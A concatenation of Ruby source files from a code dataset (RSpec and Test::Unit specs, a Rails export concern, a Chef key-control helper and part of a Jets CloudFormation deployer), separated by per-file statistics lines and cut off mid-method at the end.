expect(rating_areas.to_a).not_to include(rating_area)
end
it "is found when a matching address is provided" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(matching_address)
expect(rating_areas.to_a).to include(rating_area)
end
end
describe "created for a given state", :dbclean => :after_each do
let(:rating_area) { ::BenefitMarkets::Locations::RatingArea.create!(active_year: TimeKeeper.date_of_record.year, covered_states: ["MA"], exchange_provided_code: "MA0") }
let(:address_outside_state) {
OpenStruct.new(
:zip => "01001",
:county => "Hampshire",
:state => "MD"
)
}
let(:matching_address) {
OpenStruct.new(
:zip => "01001",
:county => "Hampshire",
:state => "MA"
)
}
it "will not be found when given an address not in that state" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(address_outside_state)
expect(rating_areas.to_a).not_to include(rating_area)
end
it "is found when a matching address is provided" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(matching_address)
expect(rating_areas.to_a).to include(rating_area)
end
end
end
end
| 33.350365 | 184 | 0.634274 |
aca12beaefc4341889576d0cb2fbc3ade931bba8 | 1,727 | # frozen_string_literal: true
module Exportable
extend ActiveSupport::Concern
included do
include Redis::Objects
has_one_attached :pdf, dependent: false
value :export_pdf_status
has_one_attached :archive, dependent: false
value :export_archive_status
end
def export(type)
type = type.to_sym
set_export_status(type, "running")
if type == :pdf
PDFExportJob.perform_later(self)
elsif type == :archive
ArchiveExportJob.perform_later(self)
end
end
def export_url(type)
type = type.to_sym
return nil unless send(type).attached?
if type == :pdf
"#{Setting.host}/uploads/#{pdf.blob.key}"
elsif type == :archive
"#{Setting.host}/uploads/#{archive.blob.key}"
end
end
def export_filename(type)
type = type.to_sym
fname = case self.class.name
when "Doc"
title
when "Repository"
name
when "Note"
title
else
"bluedoc-export"
end
if type == :pdf
BlueDoc::Slug.filenameize("#{fname}.pdf")
elsif type == :archive
BlueDoc::Slug.filenameize("#{fname}.zip")
end
end
def set_export_status(type, value)
type = type.to_sym
if type == :pdf
self.export_pdf_status = value
elsif type == :archive
self.export_archive_status = value
end
end
def export_status(type)
type = type.to_sym
if type == :pdf
export_pdf_status
elsif type == :archive
export_archive_status
end
end
def update_export!(type, io)
type = type.to_sym
return nil if io.blank?
send(type).attach(io: io, filename: export_filename(type))
save!
end
end
| 20.807229 | 62 | 0.62073 |
f7b110a024a8b7e813176faba8fa069e931fbee7 | 5,384 | # frozen_string_literal: true
require 'pathname'
require 'net/http'
describe 'FlameCLI::New::App' do
let(:app_name) { 'foo_bar' }
subject(:execute_command) do
`#{FLAME_CLI} new app #{app_name}`
end
let(:template_dir) { File.join(__dir__, '../../../template') }
let(:template_dir_pathname) { Pathname.new(template_dir) }
let(:template_ext) { '.erb' }
after do
FileUtils.rm_r File.join(__dir__, '../../..', app_name)
end
describe 'output' do
it do
is_expected.to match_words(
"Creating '#{app_name}' directory...",
'Copy template directories and files...',
'Clean directories...',
'Replace module names in template...',
'- config.ru',
'- application.rb',
'- config/config.rb',
'- config/sequel.rb',
'- controllers/_controller.rb',
'- controllers/site/_controller.rb',
'- controllers/site/index_controller.rb',
'Grant permissions to files...',
'Done!'
)
end
end
describe 'creates root directory with received app name' do
subject { Dir.exist?(app_name) }
before { execute_command }
it { is_expected.to be true }
end
describe 'copies template directories and files into app root directory' do
before { execute_command }
let(:files) do
Dir[File.join(template_dir, '**/*')]
.map do |filename|
filename_pathname = Pathname.new(filename)
.relative_path_from(template_dir_pathname)
next if File.dirname(filename).split(File::SEPARATOR).include? 'views'
if filename_pathname.extname == template_ext
filename_pathname = filename_pathname.sub_ext('')
end
File.join app_name, filename_pathname
end
.compact
end
subject { File }
it { files.each { |file| is_expected.to exist file } }
end
describe 'cleans directories' do
before { execute_command }
subject { Dir[File.join(app_name, '**/.keep')] }
it { is_expected.to be_empty }
end
describe 'renders app name in files' do
before { execute_command }
subject { File.read File.join(app_name, *path_parts) }
describe 'config.ru' do
let(:path_parts) { 'config.ru' }
it do
is_expected.to match_words(
'use Rack::Session::Cookie, FB::Application.config[:session][:cookie]',
'FB::Application.config[:server][environment.to_s][:logs_dir]',
'FB::Application.config[:logger] = Logger.new',
'FB::DB.loggers <<',
'FB.logger',
'FB::DB.freeze',
'run FB::Application'
)
end
end
describe 'application.rb' do
let(:path_parts) { 'application.rb' }
it do
is_expected.to match_words(
'module FooBar',
'include FB::Config'
)
end
end
describe 'controllers/_controller.rb' do
let(:path_parts) { ['controllers', '_controller.rb'] }
it do
is_expected.to match_words(
'module FooBar',
'FB.logger'
)
end
end
describe 'controllers/site/_controller.rb' do
let(:path_parts) { ['controllers', 'site', '_controller.rb'] }
it do
is_expected.to match_words(
'module FooBar',
'class Controller < FB::Controller'
)
end
end
describe 'controllers/site/index_controller.rb' do
let(:path_parts) { ['controllers', 'site', 'index_controller.rb'] }
it do
is_expected.to match_words(
'module FooBar',
'class IndexController < FB::Site::Controller'
)
end
end
describe 'config/config.rb' do
let(:path_parts) { ['config', 'config.rb'] }
it do
is_expected.to match_words(
'module FooBar',
"SITE_NAME = 'FooBar'",
"ORGANIZATION_NAME = 'FooBar LLC'",
'::FB = ::FooBar',
'FB::Application.config[:logger]'
)
end
end
describe 'config/sequel.rb' do
let(:path_parts) { ['config', 'sequel.rb'] }
it do
is_expected.to match_words(
'module FooBar'
)
end
end
end
describe 'generates working app' do
before do
ENV['RACK_ENV'] = 'development'
execute_command
Dir.chdir app_name
## HACK for new unreleased features
File.write(
'Gemfile',
File.read('Gemfile').sub(
"gem 'flame', github: 'AlexWayfer/flame'\n", "gem 'flame', path: '..'\n"
)
)
%w[server].each do |config|
FileUtils.cp "config/#{config}.example.yml", "config/#{config}.yml"
end
## HACK for testing while some server is running
File.write(
'config/server.yml',
File.read('config/server.yml').sub('port: 3000', "port: #{port}")
)
system 'bundle install --gemfile=Gemfile'
end
let(:port) { 3456 }
subject do
begin
pid = spawn './server start'
number_of_attempts = 0
begin
number_of_attempts += 1
response = Net::HTTP.get URI("http://localhost:#{port}/")
rescue Errno::ECONNREFUSED => e
sleep 1
retry if number_of_attempts < 10
raise e
end
response
ensure
`./server stop`
Process.wait pid
end
end
after do
Dir.chdir '..'
end
it do
is_expected.to eq <<~RESPONSE
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>FooBar</title>
</head>
<body>
<h1>Hello, world!</h1>
</body>
</html>
RESPONSE
end
end
describe 'grants `./server` file execution permissions' do
before do
execute_command
Dir.chdir app_name
end
after do
Dir.chdir '..'
end
subject { File.stat('server').mode.to_s(8)[3..5] }
it { is_expected.to eq '744' }
end
end
| 20.787645 | 77 | 0.628343 |
abbadd65b50ed3497c5c7281ae580599ee08e3e5 | 16,368 | require File.join(File.dirname(__FILE__), 'spec_helper')
describe Activr::Storage do
let(:user) { User.create(:_id => 'jpale', :first_name => "Jean", :last_name => "PALE") }
let(:picture) { Picture.create(:title => "Me myself and I") }
let(:album) { Album.create(:name => "Selfies") }
let(:owner) { User.create(:_id => 'corinne', :first_name => "Corinne", :last_name => "CHTITEGOUTE") }
let(:buddy) { User.create(:_id => 'justine', :first_name => "Justine", :last_name => "CHTITEGOUTE") }
let(:follower) { User.create(:_id => 'anne', :first_name => "Anne", :last_name => "CHTITEGOUTE") }
after(:each) do
Activr.storage.clear_hooks!
end
it "detects a valid document id" do
str_doc_id = "51a5bb06b7b95d7282000005"
Activr.storage.valid_id?(str_doc_id).should be_true
doc_id = if defined?(::Moped::BSON)
::Moped::BSON::ObjectId(str_doc_id)
elsif defined?(::BSON::ObjectId)
::BSON::ObjectId.from_string(str_doc_id)
else
str_doc_id
end
Activr.storage.valid_id?(doc_id).should be_true
end
it "detects an invalid document id" do
Activr.storage.valid_id?(Hash.new).should be_false
end
it "detects a serialized document id" do
doc_id = { '$oid' => '51a5bb06b7b95d7282000005' }
Activr.storage.serialized_id?(doc_id).should be_true
end
it "detects a not serialized document id" do
doc_id = '51a5bb06b7b95d7282000005'
Activr.storage.serialized_id?(doc_id).should be_false
end
it "unserialize a document id" do
hash_doc_id = { '$oid' => '51a5bb06b7b95d7282000005' }
doc_id = Activr.storage.unserialize_id(hash_doc_id)
Activr.storage.valid_id?(doc_id).should be_true
end
#
# Activities
#
it "inserts an activity" do
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
doc_id = Activr.storage.insert_activity(activity)
Activr.storage.valid_id?(doc_id).should be_true
end
it "finds an activity by id" do
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
doc_id = Activr.storage.insert_activity(activity)
fetched_activity = Activr.storage.find_activity(doc_id)
fetched_activity.should_not be_nil
fetched_activity._id.should == doc_id
end
context "with stored activities" do
before(:each) do
@activity_1 = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
@activity_1.store!
Delorean.jump(30)
@activity_2 = FollowAlbumActivity.new(:actor => user, :album => album)
@activity_2.store!
end
it "finds activities" do
Activr.storage.find_activities(10).map(&:_id).should == [ @activity_2._id, @activity_1._id ]
end
it "counts activities" do
Activr.storage.count_activities.should == 2
end
it "finds activities filtered with :only option" do
Activr.storage.find_activities(10, :only => AddPictureActivity).map(&:_id).should == [ @activity_1._id ]
Activr.storage.find_activities(10, :only => FollowAlbumActivity).map(&:_id).should == [ @activity_2._id ]
Activr.storage.find_activities(10, :only => LikePictureActivity).should == [ ]
Activr.storage.find_activities(10, :only => [ AddPictureActivity, FollowAlbumActivity ]).map(&:_id).should == [ @activity_2._id, @activity_1._id ]
Activr.storage.find_activities(10, :only => [ AddPictureActivity, LikePictureActivity ]).map(&:_id).should == [ @activity_1._id ]
end
it "counts activities filtered with :only option" do
Activr.storage.count_activities(:only => AddPictureActivity).should == 1
Activr.storage.count_activities(:only => FollowAlbumActivity).should == 1
Activr.storage.count_activities(:only => LikePictureActivity).should == 0
Activr.storage.count_activities(:only => [ AddPictureActivity, FollowAlbumActivity ]).should == 2
Activr.storage.count_activities(:only => [ AddPictureActivity, LikePictureActivity ]).should == 1
end
it "find activities with :entities option" do
Activr.storage.find_activities(10, :entities => { :actor => user._id }).map(&:_id).should == [ @activity_2._id, @activity_1._id ]
Activr.storage.find_activities(10, :entities => { :picture => picture._id }).map(&:_id).should == [ @activity_1._id ]
Activr.storage.find_activities(10, :entities => { :album => album._id }).map(&:_id).should == [ @activity_2._id, @activity_1._id ]
Activr.storage.find_activities(10, :entities => {:actor => user._id, :album => album._id }).map(&:_id).should == [ @activity_2._id, @activity_1._id ]
Activr.storage.find_activities(10, :entities => {:actor => user._id, :picture => picture._id, :album => album._id }).map(&:_id).should == [ @activity_1._id ]
end
it "counts activities filtered with :only option" do
Activr.storage.count_activities(:entities => { :actor => user._id }).should == 2
Activr.storage.count_activities(:entities => { :picture => picture._id }).should == 1
Activr.storage.count_activities(:entities => { :album => album._id }).should == 2
Activr.storage.count_activities(:entities => {:actor => user._id, :album => album._id }).should == 2
Activr.storage.count_activities(:entities => {:actor => user._id, :picture => picture._id, :album => album._id }).should == 1
end
it "deletes activities referring to an entity model instance" do
Activr.storage.delete_activities_for_entity_model(picture)
# check
Activr.storage.find_activities(10).map(&:_id).should == [ @activity_2._id ]
Activr.storage.delete_activities_for_entity_model(user)
# check
Activr.storage.find_activities(10).map(&:_id).should == [ ]
end
end
it "counts duplicate activities" do
AddPictureActivity.new(:actor => user, :picture => picture, :album => album).store!
Delorean.jump(10)
FollowAlbumActivity.new(:actor => user, :album => album).store!
Delorean.jump(10)
AddPictureActivity.new(:actor => user, :picture => picture, :album => album).store!
Delorean.jump(10)
AddPictureActivity.new(:actor => user, :picture => picture, :album => album).store!
Delorean.jump(10)
# check
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
Activr.storage.count_duplicate_activities(activity, Time.now.utc - 45).should == 3
Activr.storage.count_duplicate_activities(activity, Time.now.utc - 35).should == 2
Activr.storage.count_duplicate_activities(activity, Time.now.utc - 15).should == 1
Activr.storage.count_duplicate_activities(activity, Time.now.utc - 5).should == 0
end
#
# Timelines
#
it "inserts a timeline entry" do
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
activity.store!
timeline = UserNewsFeedTimeline.new(owner)
timeline_entry = Activr::Timeline::Entry.new(timeline, 'album_owner', activity)
doc_id = Activr.storage.insert_timeline_entry(timeline_entry)
doc_id.should_not be_nil
end
it "finds a timeline entry by id" do
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
activity.store!
timeline = UserNewsFeedTimeline.new(owner)
timeline_entry = Activr::Timeline::Entry.new(timeline, 'album_owner', activity)
doc_id = Activr.storage.insert_timeline_entry(timeline_entry)
fetched_tl_entry = Activr.storage.find_timeline_entry(timeline, doc_id)
fetched_tl_entry.should_not be_nil
fetched_tl_entry._id.should == doc_id
end
context "with stored timelines entries" do
before(:each) do
@timeline = UserNewsFeedTimeline.new(owner)
@activity_1 = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
@activity_1.store!
@timeline_entry_1 = Activr::Timeline::Entry.new(@timeline, 'album_owner', @activity_1)
@timeline_entry_1.store!
Delorean.jump(30)
@activity_2 = FollowAlbumActivity.new(:actor => user, :album => album)
@activity_2.store!
@timeline_entry_2 = Activr::Timeline::Entry.new(@timeline, 'my_custom_routing', @activity_2)
@timeline_entry_2.store!
end
it "finds timeline entries" do
Activr.storage.find_timeline(@timeline, 10).map(&:_id).should == [ @timeline_entry_2._id, @timeline_entry_1._id ]
end
it "counts timeline entries" do
Activr.storage.count_timeline(@timeline).should == 2
end
it "finds timeline entries filtered with :only option" do
route = @timeline.route_for_routing_and_activity('my_custom_routing', FollowAlbumActivity)
route.should_not be_nil
Activr.storage.find_timeline(@timeline, 10, :only => route).map(&:_id).should == [ @timeline_entry_2._id ]
route = @timeline.route_for_routing_and_activity('album_owner', AddPictureActivity)
route.should_not be_nil
Activr.storage.find_timeline(@timeline, 10, :only => route).map(&:_id).should == [ @timeline_entry_1._id ]
route = @timeline.route_for_routing_and_activity('picture_owner', LikePictureActivity)
route.should_not be_nil
Activr.storage.find_timeline(@timeline, 10, :only => route).should == [ ]
end
it "counts timeline entries filtered with :only option" do
route = @timeline.route_for_routing_and_activity('my_custom_routing', FollowAlbumActivity)
route.should_not be_nil
Activr.storage.count_timeline(@timeline, :only => route).should == 1
route = @timeline.route_for_routing_and_activity('album_owner', AddPictureActivity)
route.should_not be_nil
Activr.storage.count_timeline(@timeline, :only => route).should == 1
route = @timeline.route_for_routing_and_activity('picture_owner', LikePictureActivity)
route.should_not be_nil
Activr.storage.count_timeline(@timeline, :only => route).should == 0
end
it "deletes all timeline entries" do
timeline_2 = UserNewsFeedTimeline.new(buddy)
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_1).store!
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_2).store!
Activr.storage.count_timeline(@timeline).should == 2
Activr.storage.count_timeline(timeline_2).should == 2
# test
Activr.storage.delete_timeline(@timeline)
# check
Activr.storage.count_timeline(@timeline).should == 0
Activr.storage.count_timeline(timeline_2).should == 2
# test
Activr.storage.delete_timeline(timeline_2)
# check
Activr.storage.count_timeline(@timeline).should == 0
Activr.storage.count_timeline(timeline_2).should == 0
end
it "deletes timeline entries with :before option" do
timeline_2 = UserNewsFeedTimeline.new(buddy)
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_1).store!
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_2).store!
Activr.storage.count_timeline(@timeline).should == 2
# test
Activr.storage.delete_timeline(@timeline, :before => (Time.now.utc - 45))
# check
Activr.storage.count_timeline(@timeline).should == 2
# test
Activr.storage.delete_timeline(@timeline, :before => (Time.now.utc - 15))
# check
Activr.storage.count_timeline(@timeline).should == 1
# test
Delorean.jump(30)
Activr.storage.delete_timeline(@timeline, :before => (Time.now.utc - 15))
# check
Activr.storage.count_timeline(@timeline).should == 0
Activr.storage.count_timeline(timeline_2).should == 2
end
it "deletes timeline entries with :entities option" do
timeline_2 = UserNewsFeedTimeline.new(buddy)
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_1).store!
Activr::Timeline::Entry.new(timeline_2, 'actor_follower', @activity_2).store!
Activr.storage.count_timeline(@timeline).should == 2
# test
Activr.storage.delete_timeline(@timeline, :entities => { :picture => picture._id, :album => album._id })
# check
Activr.storage.count_timeline(@timeline).should == 1
# test
Activr.storage.delete_timeline(@timeline, :entities => { :actor => user._id })
# check
Activr.storage.count_timeline(@timeline).should == 0
Activr.storage.count_timeline(timeline_2).should == 2
end
it "deletes timeline entries referring to an entity model instance" do
Activr.storage.delete_timeline_entries_for_entity_model(picture)
# check
Activr.storage.find_timeline(@timeline, 10).map(&:_id).should == [ @timeline_entry_2._id ]
Activr.storage.delete_timeline_entries_for_entity_model(user)
# check
Activr.storage.find_timeline(@timeline, 10).map(&:_id).should == [ ]
end
end
#
# Hooks
#
it "runs :will_insert_activity hook" do
Activr.storage.will_insert_activity do |activity_hash|
activity_hash['foo'] = 'bar'
end
Activr.storage.will_insert_activity do |activity_hash|
activity_hash['meta'] ||= { }
activity_hash['meta']['bar'] = 'baz'
end
# test
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
activity.store!
activity_hash = Activr.storage.driver.find_activity(activity._id)
activity_hash.should_not be_nil
activity_hash['foo'].should == 'bar'
activity_hash['meta'].should == {
'bar' => 'baz',
}
fetched_activity = Activr.storage.find_activity(activity._id)
fetched_activity[:foo].should == 'bar'
fetched_activity[:bar].should == 'baz'
end
it "runs :did_find_activity hook" do
Activr.storage.did_find_activity do |activity_hash|
activity_hash['foo'] = 'bar'
end
Activr.storage.did_find_activity do |activity_hash|
activity_hash['meta'] ||= { }
activity_hash['meta']['bar'] = 'baz'
end
# test
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
activity.store!
# check
activity_hash = Activr.storage.driver.find_activity(activity._id)
activity_hash['foo'].should be_blank
activity_hash['meta'].should be_blank
fetched_activity = Activr.storage.find_activity(activity._id)
fetched_activity[:foo].should == 'bar'
fetched_activity[:bar].should == 'baz'
end
it "runs :will_insert_timeline_entry hook" do
Activr.storage.will_insert_timeline_entry do |timeline_entry_hash, timeline_class|
timeline_entry_hash['meta'] ||= { }
timeline_entry_hash['meta']['foo'] = 'bar'
end
Activr.storage.will_insert_timeline_entry do |timeline_entry_hash, timeline_class|
timeline_entry_hash['meta'] ||= { }
timeline_entry_hash['meta']['bar'] = 'baz'
end
# test
timeline = UserNewsFeedTimeline.new(owner)
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
timeline_entry = Activr::Timeline::Entry.new(timeline, 'album_owner_add_picture', activity)
timeline_entry.store!
# check
timeline_entry_hash = Activr.storage.driver.find_timeline_entry(timeline.kind, timeline_entry._id)
timeline_entry_hash['meta'].should == {
'foo' => 'bar',
'bar' => 'baz',
}
end
it "runs :did_find_timeline_entry hook" do
Activr.storage.did_find_timeline_entry do |timeline_entry_hash, timeline_class|
timeline_entry_hash['meta'] ||= { }
timeline_entry_hash['meta']['foo'] = 'bar'
end
Activr.storage.did_find_timeline_entry do |timeline_entry_hash, timeline_class|
timeline_entry_hash['meta'] ||= { }
timeline_entry_hash['meta']['bar'] = 'baz'
end
# test
timeline = UserNewsFeedTimeline.new(owner)
activity = AddPictureActivity.new(:actor => user, :picture => picture, :album => album)
timeline_entry = Activr::Timeline::Entry.new(timeline, 'album_owner_add_picture', activity)
timeline_entry.store!
# check
fetched_tl_entry = Activr.storage.find_timeline_entry(timeline, timeline_entry._id)
fetched_tl_entry._id.should == timeline_entry._id
fetched_tl_entry[:foo].should == 'bar'
fetched_tl_entry[:bar].should == 'baz'
tl_entries = timeline.find(10)
tl_entries.first[:foo].should == 'bar'
tl_entries.first[:bar].should == 'baz'
end
end
| 36.61745 | 163 | 0.68695 |
e9ca9293ba81fab9c40fa6f413493eaa8c5eb214 | 1,276 | #######################################################
# tc_fetch.rb
#
# Test suite for the Array#fetch instance method.
#######################################################
require "test/unit"
class TC_Array_Fetch_Instance < Test::Unit::TestCase
def setup
@array = %w/a b c d/
end
def test_fetch_basic
assert_respond_to(@array, :fetch)
assert_nothing_raised{ @array.fetch(0) }
assert_nothing_raised{ @array.fetch(0, "a") }
assert_nothing_raised{ @array.fetch(0){ } }
end
def test_fetch_results
assert_equal("a", @array.fetch(0))
assert_equal("c", @array.fetch(2))
assert_equal("d", @array.fetch(-1))
assert_equal("c", @array.fetch(-2))
assert_equal("test", @array.fetch(99, "test"))
end
def test_fetch_with_block
assert_equal(8, @array.fetch(4){ |i| i * 2 })
assert_equal(-10, @array.fetch(-5){ |i| i * 2 })
assert_equal("test", @array.fetch(99){ "test" })
end
def test_fetch_expected_errors
assert_raises(ArgumentError){ @array.fetch }
assert_raises(ArgumentError){ @array.fetch{ "test" } }
assert_raises(IndexError){ @array.fetch(4) }
assert_raises(IndexError){ @array.fetch(-5) }
end
def teardown
@array = nil
end
end
| 28.355556 | 60 | 0.581505 |
796de892811f1589850e51ea24c6e4bd2408b379 | 6,225 | require "chef/config"
require "chef/key"
module ChefServerCtl
module Helpers
class KeyCtlHelper
def initialize
Chef::Config.from_file(ChefServerCtl::Config.knife_config_file)
end
# Optparse doesn't properly handle the case where you specify an argument with mandatory input
# and then pass another argument after it. It detects the second argument as input to the first argument.
#
# For example, if you have two arguments with mandatory input, --username NAME and
# --public-key-path PATH, defined in optparse, and you pass:
#
# cmd --username --public-key-path /etc/key
#
# It will detect the input to --username as --public-key-path and won't even detect --public-key-path as an argument.
# This helper method takes in a list of argument commands and checks that the input to a given argument isn't actually
# another argument, and throws an error with a relevant message if so, fixing the case that an argument with mandatory
# input isn't actually eating up the next argument as its input.
def catch_argument_passed_as_input(arg_list, arg, arg_input)
arg_list.each do |arg_element|
if arg_input.strip == arg_element
exit_failure(missing_input_msg(arg))
end
end
end
def exit_failure(msg)
STDERR.puts msg
raise SystemExit.new(1, msg)
end
def populate_client_key(clientname, name, public_key, expiration_date)
key = Chef::Key.new(clientname, "client")
populate_key_helper(key, name, public_key, expiration_date)
end
def populate_user_key(username, name, public_key, expiration_date)
key = Chef::Key.new(username, "user")
populate_key_helper(key, name, public_key, expiration_date)
end
def populate_key_helper(key, name, public_key, expiration_date)
key.name name
key.expiration_date expiration_date
if public_key
key.public_key public_key
else
key.create_key true
end
key
end
def check_valid_iso_date(expiration_date)
unless /^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z|infinity)$/.match(expiration_date)
exit_failure(invalid_date_msg)
end
end
def read_and_check_key(key_path)
begin
key = File.read(key_path)
rescue
exit_failure(public_key_path_msg)
end
unless /BEGIN (RSA |)PUBLIC KEY/.match(key)
exit_failure(not_a_public_key_msg)
end
key
end
def add_key_usage
<<EOS
Usage: If --public-key-path isn't passed, the server will generate a public key for you.
Usage: Expiration date defaults to infinity. Pass an ISO 8601 fomatted string: YYYY-MM-DDTHH:MM:SSZ e.g. 2013-12-24T21:00:00Z in UTC timezone.
Usage: Default name used is the fingerprint of the key passed.
EOS
end
def parse_missing_arg_error(err)
arg = err.message.match(/(?<=missing argument:\s).*/)[0]
exit_failure(missing_valid_input_msg(arg))
end
def parse_invalid_arg_error(err)
arg = err.message.match(/(?<=invalid option:\s).*/)[0]
exit_failure(invalid_arg_msg(arg))
end
def exit_http_fail(err)
exit_failure("Error: An unexpected error has occured (the server returned a #{err.response.code}).\nError: Please contact a system admin if the problem persists.")
end
def get_required_arg!(options, args, usage, field_symbol, field_name, field_number)
field_value = nil
if args.nil? || args[field_number - 1].nil?
exit_failure(usage + argument_missing_msg(field_name, field_number))
else
field_value = args[field_number - 1]
end
options[field_symbol] = field_value
end
def build_key_object(name, key, expiration_date)
{
"name" => name,
"public_key" => key,
"expiration_date" => expiration_date,
}
end
def output_simple_key_results(results)
results.each do |result|
puts "\nname: #{result["name"]}"
puts "expired: #{result["expired"]}"
end
end
def output_full_key_results(results)
results.each do |result|
result = result[1]
puts "\nname: #{result.name}"
puts "expiration_date: #{result.expiration_date}"
puts "public_key:"
puts result.public_key
end
end
######################
# message generators #
######################
def missing_input_msg(arg)
"Error: Missing valid input for argument #{arg}."
end
def invalid_date_msg
<<EOS
--expiration-date must be followed by a valid ISO 8601 fomatted string YYYY-MM-DDTHH:MM:SSZ e.g. 2013-12-24T21:00:00Z or infinity.
It defaults to infinity if you do not pass --expiration-date.
EOS
end
def not_a_public_key_msg
<<EOS
Error: Invalid public key passed. Key must begin with:
Error: -----BEGIN PUBLIC KEY----- or
Error: -----BEGIN RSA PUBLIC KEY-----
EOS
end
def public_key_path_msg
"Error: --public-key-path PUBLIC_KEY_PATH must be a valid path."
end
def missing_valid_input_msg(arg)
"Error: Missing valid input for argument #{arg}."
end
def invalid_arg_msg(arg)
"Error: Invalid argument #{arg} detected. Please remove or use a different command."
end
def argument_missing_msg(field_name, field_number)
"\nError: You forgot to pass #{field_name}, which should have been argument number #{field_number}."
end
def pass_key_name_if_public_key_missing
<<EOS
Error: You did not pass --public-key-path or --key-name.
Error: A key-name cannot be auto-generated if you do not pass --public-key-path.
Error: Either pass a valid public key via --public-key path or supply a name via --key-name.
EOS
end
def print_private_key(key_name, private_key_string)
puts "New private key for key named #{key_name} (please store, it is not saved in the database):"
puts private_key_string
end
end
end
end
| 33.111702 | 171 | 0.644337 |
035b4df1ae76d4eb089ee3ec6f5dc9a9d3ea5844 | 7,683 | require 'action_view'
class Jets::Cfn
class Ship
include Jets::Timing
include Jets::AwsServices
include ActionView::Helpers::NumberHelper # number_to_human_size
def initialize(options)
@options = options
@parent_stack_name = Jets::Naming.parent_stack_name
@template_path = Jets::Naming.parent_template_path
end
def run
upload_to_s3 if @options[:stack_type] == :full # s3 bucket is available
# only when stack_type is full
stack_in_progress?(@parent_stack_name)
puts "Deploying CloudFormation stack with jets app!"
begin
save_stack
rescue Aws::CloudFormation::Errors::InsufficientCapabilitiesException => e
capabilities = e.message.match(/\[(.*)\]/)[1]
confirm = prompt_for_iam(capabilities)
if confirm =~ /^y/
@options.merge!(capabilities: [capabilities])
puts "Re-running: #{command_with_iam(capabilities).colorize(:green)}"
retry
else
puts "Exited"
exit 1
end
end
wait_for_stack
prewarm
show_api_endpoint
end
time :run
def save_stack
if stack_exists?(@parent_stack_name)
update_stack
else
create_stack
end
end
def create_stack
# parent stack template is on filesystem and child stacks templates is on s3
cfn.create_stack(stack_options)
end
time :create_stack
def update_stack
begin
cfn.update_stack(stack_options)
rescue Aws::CloudFormation::Errors::ValidationError => e
puts "ERROR: #{e.message}".red
true # error
end
end
time :update_stack
# options common to both create_stack and update_stack
def stack_options
{
stack_name: @parent_stack_name,
template_body: IO.read(@template_path),
capabilities: capabilities, # ["CAPABILITY_IAM", "CAPABILITY_NAMED_IAM"]
# disable_rollback: !@options[:rollback],
}
end
# check for /(_COMPLETE|_FAILED)$/ status
def wait_for_stack
Jets::Cfn::Status.new(@options).wait
end
time :wait_for_stack
def prewarm
return unless @options[:stack_type] == :full # s3 bucket is available
return unless Jets.config.prewarm.enable
return if Jets::Commands::Build.poly_only?
puts "Prewarming application..."
if Jets::PreheatJob::CONCURRENCY > 1
Jets::PreheatJob.perform_now(:torch, {quiet: true})
else
Jets::PreheatJob.perform_now(:warm, {quiet: true})
end
end
def show_api_endpoint
return unless @options[:stack_type] == :full # s3 bucket is available
return if Jets::Router.routes.empty?
resp, status = stack_status
return if status.include?("ROLLBACK")
resp = cfn.describe_stack_resources(stack_name: @parent_stack_name)
resources = resp.stack_resources
api_gateway = resources.find { |resource| resource.logical_resource_id == "ApiGateway" }
stack_id = api_gateway["physical_resource_id"]
resp = cfn.describe_stacks(stack_name: stack_id)
stack = resp["stacks"].first
output = stack["outputs"].find { |o| o["output_key"] == "RestApiUrl" }
endpoint = output["output_value"]
puts "API Gateway Endpoint: #{endpoint}"
end
# All CloudFormation states listed here:
# http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-cfn-describing-stacks.html
def stack_status
resp = cfn.describe_stacks(stack_name: @parent_stack_name)
status = resp.stacks[0].stack_status
[resp, status]
end
def prompt_for_iam(capabilities)
puts "This stack will create IAM resources. Please approve to run the command again with #{capabilities} capabilities."
puts " #{command_with_iam(capabilities)}"
puts "Please confirm (y/n)"
$stdin.gets # confirm
end
def command_with_iam(capabilities)
"#{File.basename($0)} #{ARGV.join(' ')} --capabilities #{capabilities}"
end
def capabilities
["CAPABILITY_IAM", "CAPABILITY_NAMED_IAM"] # TODO: remove capabilities hardcode
# return @options[:capabilities] if @options[:capabilities]
# if @options[:iam]
# ["CAPABILITY_IAM", "CAPABILITY_NAMED_IAM"]
# end
end
# Upload both code and child templates to s3
def upload_to_s3
raise "Did not specify @options[:s3_bucket] #{@options[:s3_bucket].inspect}" unless @options[:s3_bucket]
upload_cfn_templates
upload_code
upload_assets
end
time :upload_to_s3
def bucket_name
@options[:s3_bucket]
end
def upload_cfn_templates
puts "Uploading child CloudFormation templates to S3"
expression = "#{Jets::Naming.template_path_prefix}-*"
Dir.glob(expression).each do |path|
next unless File.file?(path)
key = "jets/cfn-templates/#{File.basename(path)}"
obj = s3_resource.bucket(bucket_name).object(key)
obj.upload_file(path)
end
end
def upload_code
md5_code_zipfile = Jets::Naming.md5_code_zipfile
file_size = number_to_human_size(File.size(md5_code_zipfile))
puts "Uploading #{md5_code_zipfile} (#{file_size}) to S3"
start_time = Time.now
key = Jets::Naming.code_s3_key
obj = s3_resource.bucket(bucket_name).object(key)
obj.upload_file(md5_code_zipfile)
puts "Time to upload code to s3: #{pretty_time(Time.now-start_time).colorize(:green)}"
end
def upload_assets
puts "Uploading public assets"
start_time = Time.now
asset_folders = Jets.config.assets.folders
asset_folders.each do |folder|
upload_asset_folder(folder)
end
